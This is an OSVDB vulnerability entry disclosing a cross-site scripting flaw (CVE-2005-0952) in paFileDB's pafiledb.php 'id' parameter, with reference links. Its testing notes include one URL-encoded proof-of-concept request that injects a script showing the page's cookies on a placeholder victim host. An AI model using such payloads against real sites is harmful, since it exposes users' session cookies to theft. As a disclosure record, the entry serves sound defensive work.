paFileDB pafiledb.php id Variable XSS

2005-03-30T00:28:40
ID OSVDB:15809
Type osvdb
Reporter OSVDB
Modified 2005-03-30T00:28:40

Description

Manual Testing Notes

http://[victim]/pafiledb/pafiledb.php?action=file&id=%22%3E%20%20%3Cscript%3Ealert(document.cookie)%3C/script%3E

References:

Other Advisory URL: http://digitalparadox.org/advisories/pafdb.txt Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=111221940107161&w=2 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0114.html CVE-2005-0952